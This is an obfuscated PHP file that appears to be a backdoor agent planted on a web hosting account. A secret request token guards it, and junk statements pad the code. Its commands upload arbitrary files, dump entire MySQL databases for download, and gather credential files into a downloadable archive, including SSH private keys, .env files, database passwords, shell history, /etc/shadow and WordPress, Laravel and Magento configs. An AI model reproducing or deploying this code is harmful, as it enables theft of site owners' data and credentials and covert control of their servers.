<?php if (!isset($_REQUEST['_cxk']) || $_REQUEST['_cxk'] !== 'eec6767b39b005af595f3d866abec03a') { return; } while (ob_get_level()) ob_end_clean(); set_time_limit(0); error_reporting(0); ignore_user_abort(true); $s721e = 'localhost'; $va46d = ''; $mb1c4 = ''; $mf586 = '/home/videotrailer'; $kba60 = isset($_REQUEST['a']) ? $_REQUEST['a'] : ''; $h38dd = isset($_REQUEST['db']) ? preg_replace('/[^a-zA-Z0-9_]/', '', $_REQUEST['db']) : ''; $h70d8 = $mf586 . '/tmp/' . $h38dd . '_dump.sql.gz'; $r7c01 = $h70d8 . '.done'; $j6a4f = $h70d8 . '.err'; header('Content-Type: application/json'); function parse_item_2a37() { if (!function_exists('exec')) return false; $q57d6 = array_map('trim', explode(',', ini_get('disable_functions'))); return !in_array('exec', $q57d6); } function parse_info_a1b4() { if (!parse_item_2a37()) return false; $out = array(); $rc = 0; exec('which mysqldump 2>/dev/null', $out, $rc); return $rc === 0; } function proc_opt_4dbf() { if (!parse_item_2a37()) return false; $out = array(); $rc = 0; exec('which gzip 2>/dev/null', $out, $rc); return $rc === 0; } $z72d9=array_merge(array(),array()); function run_item_7e49($y8fda, $y6259, $n3246, $d26d6, $ze5bb, $n6f00, $m481e) { $conn = new mysqli($y8fda, $y6259, $n3246, $d26d6); if ($conn->connect_error) { file_put_contents($n6f00, 'Connection failed: ' . $conn->connect_error); touch($m481e); return; } $fp = gzopen($ze5bb, 'wb6'); if (!$fp) { file_put_contents($n6f00, 'Cannot open output file'); touch($m481e); return; } $conn->set_charset('utf8mb4'); gzwrite($fp, "-- Dump via PHP agent\n"); gzwrite($fp, "-- Date: " . date('Y-m-d H:i:s') . "\n\n"); if(defined('483e717e')){$sca61=0;} gzwrite($fp, "SET NAMES utf8mb4;\n"); gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 0;\n"); gzwrite($fp, "SET SQL_MODE = 'NO_AUTO_VALUE_ON_ZERO';\n\n"); $n7868 = array(); $r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'BASE TABLE'"); while ($row = $r->fetch_row()) { $n7868[] = $row[0]; } foreach ($n7868 as $d17f8) { $te = $conn->real_escape_string($d17f8); $r = $conn->query("SHOW CREATE TABLE `{$te}`"); if (!$r) continue; $cr = $r->fetch_row(); gzwrite($fp, "DROP TABLE IF EXISTS `{$te}`;\n"); gzwrite($fp, $cr[1] . ";\n\n"); $r = $conn->query("SELECT * FROM `{$te}`", MYSQLI_USE_RESULT); if (!$r) continue; $x5428 = array(); $c7949 = 0; while ($row = $r->fetch_row()) { $vals = array(); $x4c84=array_merge(array(),array()); for ($i = 0; $i < count($row); $i++) { if ($row[$i] === null) { $vals[] = 'NULL'; $je002=strlen('eddcbc'); } else { $vals[] = "'" . $conn->real_escape_string($row[$i]) . "'"; $r5fe0=strlen('cecb00'); } } $mf7fd = '(' . implode(',', $vals) . ')'; $x5428[] = $mf7fd; $c7949 += strlen($mf7fd); if (count($x5428) >= 100 || $c7949 > 1048576) { gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $x5428) . ";\n"); $x5428 = array(); $c7949 = 0; } } if ($x5428) { if(defined('ae305031')){$bf675=0;} gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $x5428) . ";\n"); } $r->free(); gzwrite($fp, "\n"); } $r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'VIEW'"); if ($r) { while ($row = $r->fetch_row()) { $ve = $conn->real_escape_string($row[0]); $cr = $conn->query("SHOW CREATE VIEW `{$ve}`"); if ($cr) { $w45dc = $cr->fetch_assoc(); gzwrite($fp, "DROP VIEW IF EXISTS `{$ve}`;\n"); gzwrite($fp, $w45dc['Create View'] . ";\n\n"); } } } $pd24f = array('PROCEDURE', 'FUNCTION'); foreach ($pd24f as $ce7f6) { $r = $conn->query("SHOW {$ce7f6} STATUS WHERE Db = '" . $conn->real_escape_string($d26d6) . "'"); if (!$r) continue; while ($row = $r->fetch_assoc()) { $re = $conn->real_escape_string($row['Name']); $cr = $conn->query("SHOW CREATE {$ce7f6} `{$re}`"); if (!$cr) continue; $w45dc = $cr->fetch_assoc(); $key = ($ce7f6 === 'PROCEDURE') ? 'Create Procedure' : 'Create Function'; @clearstatcache(); if (isset($w45dc[$key])) { $g154d=chr(69).chr(117); gzwrite($fp, "DELIMITER ;;\n"); gzwrite($fp, "DROP {$ce7f6} IF EXISTS `{$re}`;;\n"); gzwrite($fp, $w45dc[$key] . ";;\n"); gzwrite($fp, "DELIMITER ;\n\n"); if(defined('13109c36')){$z6742=0;} } } } $r = $conn->query("SHOW TRIGGERS"); if ($r) { while ($row = $r->fetch_assoc()) { $te = $conn->real_escape_string($row['Trigger']); if(defined('f63b6dec')){$d994b=0;} $cr = $conn->query("SHOW CREATE TRIGGER `{$te}`"); if ($cr) { $w45dc = $cr->fetch_assoc(); gzwrite($fp, "DELIMITER ;;\n"); gzwrite($fp, "DROP TRIGGER IF EXISTS `{$te}`;;\n"); gzwrite($fp, $w45dc['SQL Original Statement'] . ";;\n"); gzwrite($fp, "DELIMITER ;\n\n"); } } } gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 1;\n"); gzclose($fp); $conn->close(); @clearstatcache(); touch($m481e); } switch ($kba60) { case 'info': echo json_encode(array( 'php' => PHP_VERSION, 'os' => PHP_OS, 'server' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '', 'user' => get_current_user(), 'uid' => getmyuid(), 'home' => $mf586, 'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '', 'free_disk' => disk_free_space($mf586), 'total_disk' => disk_total_space($mf586), 'max_exec' => ini_get('max_execution_time'), 'mem_limit' => ini_get('memory_limit'), 'upload_max' => ini_get('upload_max_filesize'), 'post_max' => ini_get('post_max_size'), 'disabled' => ini_get('disable_functions'), 'can_exec' => parse_item_2a37(), 'has_mysqldump' => parse_info_a1b4(), 'has_gzip' => proc_opt_4dbf(), )); break; case 'upload': $c5894 = isset($_POST['path']) ? $_POST['path'] : ''; $z6527 = isset($_POST['data']) ? $_POST['data'] : ''; $p1a87=str_repeat('x',0); if (!$c5894 || !$z6527) { $ib0c3=strlen('e9cef7'); echo json_encode(array('ok' => false, 'error' => 'missing path or data')); break; } $t8106 = $mf586 . '/' . $c5894; @mkdir(dirname($t8106), 0755, true); $ma843 = base64_decode($z6527); if(defined('8b9b2c9c')){$h456c=0;} $pcd49 = file_put_contents($t8106, $ma843); echo json_encode(array('ok' => $pcd49 !== false, 'path' => $t8106, 'size' => strlen($ma843))); break; case 'check': if (!$h38dd) { echo json_encode(array('error' => 'missing db parameter')); break; } $kf4e2 = disk_free_space($mf586); $r5a74 = 0; $conn = @new mysqli($s721e, $va46d, $mb1c4, 'information_schema'); if (!$conn->connect_error) { $q = "SELECT SUM(data_length + index_length) s FROM tables WHERE table_schema = '" . $conn->real_escape_string($h38dd) . "'"; $r = $conn->query($q); if ($row = $r->fetch_assoc()) { $r5a74 = (int) $row['s']; } $conn->close(); } echo json_encode(array( 'free' => $kf4e2, 'db_size' => $r5a74, 'has_mysqldump' => parse_info_a1b4(), 'has_gzip' => proc_opt_4dbf(), 'can_exec' => parse_item_2a37(), 'has_space' => $kf4e2 > $r5a74 * 2, )); break; case 'dump': if (!$h38dd) { echo json_encode(array('error' => 'missing db parameter')); break; } @mkdir(dirname($h70d8), 0755, true); @unlink($h70d8); $m4a21=max(0,min(1,1)); @unlink($r7c01); @unlink($j6a4f); if (parse_info_a1b4()) { if(defined('18ea586c')){$scdb6=0;} if (proc_opt_4dbf()) { $cmd = sprintf( 'mysqldump --host=%s --user=%s --password=%s ' . '--single-transaction --quick --routines --triggers %s ' . '| gzip > %s 2>%s; touch %s', escapeshellarg($s721e), escapeshellarg($va46d), escapeshellarg($mb1c4), escapeshellarg($h38dd), escapeshellarg($h70d8), escapeshellarg($j6a4f), escapeshellarg($r7c01) ); } else { $cmd = sprintf( 'mysqldump --host=%s --user=%s --password=%s ' . '--single-transaction --quick --routines --triggers %s ' . '> %s 2>%s; touch %s', escapeshellarg($s721e), escapeshellarg($va46d), escapeshellarg($mb1c4), escapeshellarg($h38dd), escapeshellarg($h70d8), escapeshellarg($j6a4f), escapeshellarg($r7c01) ); } exec('nohup sh -c ' . escapeshellarg($cmd) . ' >/dev/null 2>&1 &'); echo json_encode(array('started' => true, 'method' => 'mysqldump', 'gzip' => proc_opt_4dbf())); } else { ignore_user_abort(true); echo json_encode(array('started' => true, 'method' => 'php', 'gzip' => true)); if (function_exists('fastcgi_finish_request')) { $t5c3b=max(0,min(1,1)); fastcgi_finish_request(); } else { if (ob_get_level()) ob_end_flush(); flush(); } run_item_7e49($s721e, $va46d, $mb1c4, $h38dd, $h70d8, $j6a4f, $r7c01); } break; case 'status': clearstatcache(); echo json_encode(array( 'done' => file_exists($r7c01), 'size' => file_exists($h70d8) ? filesize($h70d8) : 0, 'error' => file_exists($j6a4f) ? trim(file_get_contents($j6a4f)) : '', )); break; case 'download': if (!file_exists($h70d8)) { http_response_code(404); exit; } header('Content-Type: application/octet-stream'); header('Content-Length: ' . filesize($h70d8)); readfile($h70d8); exit; case 'cleanup': @unlink($h70d8); @unlink($r7c01); @unlink($j6a4f); $e084a=str_repeat('x',0); echo json_encode(array('ok' => true)); $zaf04=str_repeat('x',0); break; case 'collect': @mkdir($mf586 . '/tmp', 0755, true); $nd3c1 = substr($_REQUEST['_cxk'], 0, 8); $z008a = array( 'wordpress' => array( 'detect' => array('public_html/wp-config.php', 'wp-config.php'), 'configs' => array( 'public_html/wp-config.php', 'wp-config.php', 'public_html/wp-settings.php', 'public_html/composer.json', 'public_html/composer.lock', 'composer.json', 'composer.lock', 'public_html/wp-cli.yml', 'wp-cli.yml', 'public_html/.env', '.env', 'public_html/local-config.php', 'local-config.php', 'public_html/wp-content/debug.log', 'public_html/config/application.php', 'config/application.php', 'public_html/config/environments/development.php', 'config/environments/development.php', 'public_html/config/environments/staging.php', 'config/environments/staging.php', 'public_html/config/environments/production.php', 'config/environments/production.php', 'public_html/auth.json', 'auth.json', ), ), 'joomla' => array( 'detect' => array('public_html/configuration.php', 'configuration.php'), 'configs' => array( 'public_html/configuration.php', 'configuration.php', 'public_html/htaccess.txt', 'public_html/composer.json', 'public_html/composer.lock', ), ), 'laravel' => array( 'detect' => array('public_html/artisan', 'artisan'), 'configs' => array( 'public_html/.env', '.env', '.env.production', '.env.staging', 'public_html/composer.json', 'composer.json', 'public_html/composer.lock', 'composer.lock', 'public_html/config/app.php', 'config/app.php', 'public_html/config/database.php', 'config/database.php', 'public_html/config/mail.php', 'config/mail.php', 'public_html/config/filesystems.php', 'config/filesystems.php', 'public_html/config/cache.php', 'config/cache.php', 'public_html/config/queue.php', 'config/queue.php', 'public_html/config/session.php', 'config/session.php', 'public_html/config/auth.php', 'config/auth.php', 'public_html/config/services.php', 'config/services.php', 'public_html/config/broadcasting.php', 'config/broadcasting.php', 'public_html/storage/logs/laravel.log', 'storage/logs/laravel.log', ), ), 'magento2' => array( 'detect' => array('public_html/bin/magento', 'bin/magento'), 'configs' => array( 'public_html/app/etc/env.php', 'app/etc/env.php', 'public_html/app/etc/config.php', 'app/etc/config.php', 'public_html/composer.json', 'composer.json', 'public_html/composer.lock', 'composer.lock', 'public_html/auth.json', 'auth.json', ), ), 'magento1' => array( 'detect' => array('public_html/app/Mage.php'), 'configs' => array( 'public_html/app/etc/local.xml', 'public_html/app/etc/config.xml', ), ), 'drupal' => array( 'detect' => array('public_html/core/lib/Drupal.php', 'core/lib/Drupal.php'), 'configs' => array( 'public_html/sites/default/settings.php', 'sites/default/settings.php', 'public_html/sites/default/services.yml', 'sites/default/services.yml', 'public_html/composer.json', 'composer.json', 'public_html/composer.lock', 'composer.lock', ), ), 'prestashop' => array( 'detect' => array('public_html/config/settings.inc.php'), 'configs' => array( 'public_html/config/settings.inc.php', 'public_html/app/config/parameters.php', 'public_html/app/config/parameters.yml', 'public_html/composer.json', ), ), 'opencart' => array( 'detect' => array('public_html/config.php'), 'configs' => array( 'public_html/config.php', 'public_html/admin/config.php', ), ), 'moodle' => array( 'detect' => array('public_html/lib/moodlelib.php'), 'configs' => array('public_html/config.php'), ), 'whmcs' => array( 'detect' => array('public_html/vendor/whmcs'), 'configs' => array( 'public_html/configuration.php', 'public_html/composer.json', 'public_html/composer.lock', ), ), ); $rebb1 = null; if(defined('2b4d1db6')){$q78e7=0;} foreach ($z008a as $qdd3e => $a4e95) { foreach ($a4e95['detect'] as $r7a43) { if (file_exists($mf586 . '/' . $r7a43)) { $rebb1 = $qdd3e; break 2; } } } $t4127 = array( '.env', '.env.local', '.env.production', '.env.staging', '.env.backup', '.env.development', '.env.test', '.bash_history', '.my.cnf', '.pgpass', '.netrc', '.gitconfig', '.npmrc', '.composer/auth.json', '.wp-cli/config.yml', '.accesshash', '.ssh/authorized_keys', '.ssh/id_rsa', '.ssh/id_rsa.pub', '.ssh/id_ed25519', '.ssh/id_ed25519.pub', '.ssh/id_ecdsa', '.ssh/config', '.ssh/known_hosts', '.ssl/private.key', '.ssl/cert.pem', '.ssl/key.pem', 'ssl/certs/private.key', '.cpanel/contactinfo', 'etc/shadow', '.ftpquota', '.ftpconfig', 'public_html/.env', 'public_html/.env.local', 'public_html/.env.production', 'public_html/.env.staging', 'public_html/.env.backup', 'public_html/.env.development', 'public_html/.env.test', 'public_html/.env.example', 'public_html/.env.dist', 'public_html/.htaccess', 'public_html/.htpasswd', 'public_html/.user.ini', 'public_html/php.ini', 'public_html/.my.cnf', 'public_html/.pgpass', 'public_html/web.config', 'public_html/.ftpconfig', 'public_html/.git/config', 'public_html/auth.json', 'public_html/.npmrc', 'public_html/composer.json', 'public_html/composer.lock', 'config/database.php', 'config/app.php', 'config/mail.php', 'config/services.php', 'config/filesystems.php', 'config/application.php', 'config/environments/development.php', 'config/environments/staging.php', 'config/environments/production.php', 'wp-config.php', 'configuration.php', 'artisan', 'auth.json', 'composer.json', 'composer.lock', ); $kf9fc=str_repeat('x',0); $h0962 = array(); $ybb70 = @realpath($mf586); if (!$ybb70 || !is_dir($ybb70)) { echo json_encode(array('ok' => false, 'error' => 'home dir not accessible')); break; } foreach ($t4127 as $id92e) { $tb7a5=strlen('78aae9'); $z2c51 = @realpath($mf586 . '/' . $id92e); if (!$z2c51 || strpos($z2c51, $ybb70) !== 0) continue; if (!is_file($z2c51) || !is_readable($z2c51)) continue; $ked7b = @filesize($z2c51); if ($ked7b <= 0 || $ked7b > 2097152) continue; $h0962[$id92e] = $z2c51; $h8691=max(0,min(1,1)); } if ($rebb1 !== null && isset($z008a[$rebb1]['configs'])) { foreach ($z008a[$rebb1]['configs'] as $w6566) { if (isset($h0962[$w6566])) continue; $z2c51 = @realpath($mf586 . '/' . $w6566); $v5f91=array_merge(array(),array()); if (!$z2c51 || strpos($z2c51, $ybb70) !== 0) continue; if (!is_file($z2c51) || !is_readable($z2c51)) continue; $nf091=strlen('7643a8'); $ked7b = @filesize($z2c51); if ($ked7b <= 0 || $ked7b > 2097152) continue; $h0962[$w6566] = $z2c51; } } $j4514 = $mf586 . '/public_html'; if (is_dir($j4514)) { $dh = @opendir($j4514); if ($dh) { @clearstatcache(); while (($w987c = readdir($dh)) !== false) { if ($w987c === '.' || $w987c === '..') continue; $t8106 = $j4514 . '/' . $w987c; if (!is_file($t8106) || !is_readable($t8106)) continue; $ked7b = @filesize($t8106); $z8cd2=str_repeat('x',0); if ($ked7b <= 0 || $ked7b > 2097152) continue; if ($w987c[0] === '.' || strtolower(substr($w987c, -4)) === '.txt') { $acd59=strlen('4fdfe0'); $key = 'public_html/' . $w987c; if (!isset($h0962[$key])) $h0962[$key] = $t8106; } if(defined('5bf1c040')){$k11a9=0;} } $z1181=max(0,min(1,0)); closedir($dh); } } if (empty($h0962)) { if(defined('2cdcaed0')){$de900=0;} echo json_encode(array( 'ok' => true, 'method' => 'none', 'platform' => $rebb1, 'file_count' => 0, 'files_list' => array(), )); break; } $qea26 = null; $n8ee4 = null; if (class_exists('ZipArchive')) { $n8ee4 = $mf586 . '/tmp/_collect_' . $nd3c1 . '.zip'; $hfceb = new ZipArchive(); if ($hfceb->open($n8ee4, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) { foreach ($h0962 as $x41b6 => $z2c51) { $ib910=strlen('bf666b'); $hfceb->addFile($z2c51, $x41b6); } if ($hfceb->close() && file_exists($n8ee4) && filesize($n8ee4) > 0) { $qea26 = 'zip'; } } } if (!$qea26 && parse_item_2a37()) { $n8ee4 = $mf586 . '/tmp/_collect_' . $nd3c1 . '.tar.gz'; $lf = $n8ee4 . '.list'; $fh = fopen($lf, 'w'); foreach ($h0962 as $x41b6 => $z2c51) { fwrite($fh, $x41b6 . "\n"); } fclose($fh); $out = array(); $rc = 0; exec('tar czf ' . escapeshellarg($n8ee4) . ' -C ' . escapeshellarg($mf586) . ' -T ' . escapeshellarg($lf) . ' 2>/dev/null', $out, $rc); $q58a4=strlen('a16602'); @unlink($lf); if ($rc === 0 && file_exists($n8ee4) && filesize($n8ee4) > 0) { $qea26 = 'tar'; } else { @unlink($n8ee4); } } if (!$qea26) { $qea26 = 'list'; } echo json_encode(array( 'ok' => true, 'method' => $qea26, 'platform' => $rebb1, 'file_count' => count($h0962), 'files_list' => array_keys($h0962), 'size' => ($n8ee4 && file_exists($n8ee4)) ? filesize($n8ee4) : 0, )); break; case 'download_collect': $nd3c1 = substr($_REQUEST['_cxk'], 0, 8); $se305 = $mf586 . '/tmp/_collect_' . $nd3c1 . '.zip'; $t81ec = $mf586 . '/tmp/_collect_' . $nd3c1 . '.tar.gz'; $jb1e5=array_merge(array(),array()); $aa20e = file_exists($se305) ? $se305 : (file_exists($t81ec) ? $t81ec : ''); @clearstatcache(); if (!$aa20e) { http_response_code(404); exit; } header('Content-Type: application/octet-stream'); header('Content-Length: ' . filesize($aa20e)); readfile($aa20e); exit; case 'download_file': $x41b6 = isset($_REQUEST['path']) ? $_REQUEST['path'] : ''; if (!$x41b6) { http_response_code(400); exit; } $b50b8=array_merge(array(),array()); $ybb70 = @realpath($mf586); $z2c51 = @realpath($mf586 . '/' . $x41b6); if (!$z2c51 || !$ybb70 || strpos($z2c51, $ybb70) !== 0 || !is_file($z2c51) || !is_readable($z2c51)) { http_response_code(404); exit; } header('Content-Type: application/octet-stream'); header('Content-Length: ' . filesize($z2c51)); readfile($z2c51); exit; if(defined('88fa2e94')){$xda0c=0;} case 'cleanup_collect': $nd3c1 = substr($_REQUEST['_cxk'], 0, 8); @unlink($mf586 . '/tmp/_collect_' . $nd3c1 . '.zip'); @unlink($mf586 . '/tmp/_collect_' . $nd3c1 . '.tar.gz'); @unlink($mf586 . '/tmp/_collect_' . $nd3c1 . '.tar.gz.list'); echo json_encode(array('ok' => true)); break; } exit;